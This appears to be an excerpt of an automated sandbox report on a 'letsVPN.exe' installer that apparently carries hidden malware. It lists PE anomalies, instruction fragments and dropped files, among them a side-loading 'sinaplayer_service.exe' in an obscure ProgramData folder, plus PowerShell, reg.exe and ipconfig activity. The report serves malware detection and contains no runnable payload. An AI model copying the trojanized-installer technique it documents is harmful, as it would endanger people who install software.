              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets\4.0.2.0\System.Net.WebSockets.pdb source: letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2355870263.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb$.>. 0._CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2411809176.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: letsvpn-latest.exe, 00000013.00000003.2461351463.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.MemoryMappedFiles\4.0.2.0\System.IO.MemoryMappedFiles.pdb source: letsvpn-latest.exe, 00000013.00000003.2424521311.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization.Calendars\4.0.3.0\System.Globalization.Calendars.pdb source: letsvpn-latest.exe, 00000013.00000003.2417185734.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdb source: letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdb source: letsvpn-latest.exe, 00000013.00000003.2408789957.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: letsvpn-latest.exe, 00000013.00000003.2352489250.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: System.Web.Services.Description.resources.dll.19.dr Static PE information: 0x98399BEE [Tue Dec 6 04:05:02 2050 UTC]
              Source: C:\Users\user\Desktop\letsVPN.exe Code function: 0_2_00000001800057CD LoadLibraryW,GetProcAddress,ShellExecuteW,LoadLibraryW,GetProcAddress,Sleep,SleepEx,DeleteFileW,CreateDirectoryW,Sleep,SleepEx,Sleep,SleepEx,ShellExecuteW,Sleep,SleepEx,Sleep,SleepEx,DeleteFileW,DeleteFileW,DeleteFileW,std::ios_base::_Ios_base_dtor, 0_2_00000001800057CD
              Source: FileSplit.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x19e98
              Source: s.0.dr Static PE information: real checksum: 0x26890d should be: 0x1370ba
              Source: System.dll.19.dr Static PE information: real checksum: 0x0 should be: 0x39be
              Source: e_sqlite3.dll0.19.dr Static PE information: section name: _RDATA
              Source: WebView2Loader.dll.19.dr Static PE information: section name: .00cfg
              Source: WebView2Loader.dll.19.dr Static PE information: section name: _RDATA
              Source: WebView2Loader.dll0.19.dr Static PE information: section name: .00cfg
              Source: WebView2Loader.dll0.19.dr Static PE information: section name: .voltbl
              Source: ndp462-web.exe.19.dr Static PE information: section name: .boxld01
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe Code function: 17_2_00397D65 push ecx; ret 17_2_00397D78
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe Code function: 17_2_6C55EDC3 push ecx; ret 17_2_6C55EDD6
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe Code function: 17_2_6C5649D7 push ecx; ret 17_2_6C5649EA
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe Code function: 17_2_6C587BA8 pushad ; iretd 17_2_6C587BB6
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe Code function: 17_2_6C5852B4 push eax; ret 17_2_6C5852D2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00C86820 push eax; ret 24_2_00C86833
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00C85EF0 push 8B059523h; retf 24_2_00C85EF5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_00C80FB0 push eax; ret 24_2_00C80FBA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 24_2_074129A0 pushad ; retf 00B4h 24_2_07412B3D
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exe Code function: 53_2_00858835 push ecx; ret 53_2_00858848
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exe Code function: 53_2_00858C76 push ecx; ret 53_2_00858C89
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Code function: 54_2_012D7040 pushad ; iretd 54_2_012D7059
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Code function: 54_2_012DB2F0 pushad ; ret 54_2_012DB303
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Code function: 54_2_012D6BC0 pushad ; retf 54_2_012D6BC1
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Code function: 54_2_012D5D78 push esp; ret 54_2_012D5D79
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe Code function: 54_2_05875290 pushfd ; ret 54_2_05875299
              Source: msvcr120.dll.0.dr Static PE information: section name: .text entropy: 6.95576372950548
              Source: msvcr120.dll.17.dr Static PE information: section name: .text entropy: 6.95576372950548
              Source: e_sqlite3.dll.19.dr Static PE information: section name: .text entropy: 7.128615396301837

              Persistence and Installation Behavior

              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\driver\tap0901.sys
              Source: C:\Windows\System32\cmd.exe Process created: reg.exe
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
              Source: C:\Windows\System32\cmd.exe File created: C:\ProgramData\0zVlL\Jd0i4~16\base.dll
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\0zVlL\Jd0i4~16\FileSplit.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.EventLog.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsDialogs.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Core.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.Reader.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Csp.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.StackTrace.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Primitives.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\ru\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-arm\native\e_sqlite3.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsExec.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.ClientEngine.dll
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\SETBC5C.tmp
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Windows.Interactivity.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsGoogleAnalytics.exe
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\0zVlL\Jd0i4~16\s
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TextWriterTraceListener.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Permissions.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Common.dll
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\0zVlL\Jd0i4~16\msvcr120.dll
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\0zVlL\Jd0i4~16\msvcp120.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.DriveInfo.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Text.RegularExpressions.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.IPNetwork.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Xml.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.ProtectedData.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Console.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Primitives.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Ports.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\WpfAnimatedGif.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Extensions.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Expressions.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Extensions.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.ReaderWriter.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Duplex.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Web.Services.Description.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Tracing.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.SqlClient.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.Common.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ValueTuple.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceProcess.ServiceController.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\x64\WebView2Loader.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.PatchApi.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-TW\LetsPRO.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.XDocument.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\ICSharpCode.AvalonEdit.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.AccessControl.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Timer.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Expression.Interactions.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.Specialized.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\it\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.AppContext.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Collections.NonGeneric.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.Encoding.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-SG\LetsPRO.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\SVGImage.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.SecureString.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe File created: C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\SETBAE5.tmp
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\System.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.PerformanceCounter.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Web.WebView2.Wpf.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Handles.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Cryptography.X509Certificates.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Xml.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Globalization.Calendars.dll
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\tap0901.sys (copy)
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Security.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-CN\LetsPRO.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\DeltaCompressionDotNet.MsDelta.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebHeaderCollection.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\pl\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlDocument.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Numerics.Vectors.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Contracts.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Users\user\AppData\Local\Temp\nsmFF73.tmp\nsProcess.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\de\System.Web.Services.Description.resources.dll
              Source: C:\Windows\System32\drvinst.exe File created: C:\Windows\System32\drivers\tap0901.sys (copy)
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Pipes.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\runtimes\win-x86\native\e_sqlite3.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-HK\LetsPRO.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NameResolution.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\fr\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File created: C:\Users\user\Videos\24D30D1C~16\msvcp120.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\arm64\WebView2Loader.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Extensions.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Requests.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.Parallel.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.CodeDom.dll
              Source: C:\Users\user\Desktop\letsVPN.exe File created: C:\ProgramData\letsvpn-latest.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\es\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.IsolatedStorage.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Resources.ResourceManager.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\ru\LetsPRO.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.EventBasedAsync.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.Debug.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.Http.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\ndp462-web.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dll
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File created: C:\Users\user\Videos\24D30D1C~16\base.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Diagnostics.TraceSource.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Drawing.Primitives.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\zh-MO\LetsPRO.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.WebSockets.Client.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.Windows.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.ThreadPool.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\FontAwesome.WPF.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Claims.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Squirrel.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Annotations.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Overlapped.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ServiceModel.NetTcp.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Toolkit.Uwp.Notifications.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.NetworkInformation.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.FileSystem.Watcher.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Data.OleDb.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Security.Principal.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\Update.exe
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.VisualC.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\pt-BR\System.Web.Services.Description.resources.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\x86\WebView2Loader.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.Compression.ZipFile.dll
              Source: C:\ProgramData\letsvpn-latest.exe File created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.dll
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe File created: C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\tap0901.sys (copy)
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.IO.MemoryMappedFiles.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Linq.Queryable.dllJump to dropped file
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeFile created: C:\Users\user\Videos\24D30D1C~16\msvcr120.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\cs\System.Web.Services.Description.resources.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.Serialization.Json.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
              Source: C:\ProgramData\letsvpn-latest.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.0\System.ComponentModel.Primitives.dllJump to dropped file
